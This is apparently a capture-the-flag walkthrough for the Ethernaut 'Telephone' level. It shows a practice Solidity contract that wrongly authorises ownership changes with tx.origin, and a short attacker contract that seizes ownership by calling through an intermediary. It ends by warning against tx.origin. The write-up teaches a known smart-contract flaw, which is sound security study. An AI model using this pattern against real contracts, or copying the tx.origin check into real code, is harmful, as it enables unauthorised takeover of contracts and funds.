4 - Telephone

tx.origin and msg.sender

Ethernaut Level4: Telephone

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Telephone {

  address public owner;

  constructor() {
    owner = msg.sender;
  }

  function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
      owner = _owner;
    }
  }
}

Goal of this level

• claim ownership of the contract

What you should know before

• Difference between tx.origin and msg.sender -> see here

Solution

Key to solve this problem 🔑

tx.origin is the very first initiator's address of the transaction while msg.sender is the caller address that directly called the contract.

contract AttackTelephone {
    Telephone telephone;

    constructor(Telephone _instanceAddr) {
        telephone = _instanceAddr;
    }

    function attack() external {
        telephone.changeOwner(tx.origin);
    }
}

In this problem, tx.origin will be your wallet address and msg.sender will be the address of AttackTelephone contract.

You just need to call attack() function.

Done! 😎

Key Takeaways

• In most cases, it is not recommended to use tx.origin in terms of security.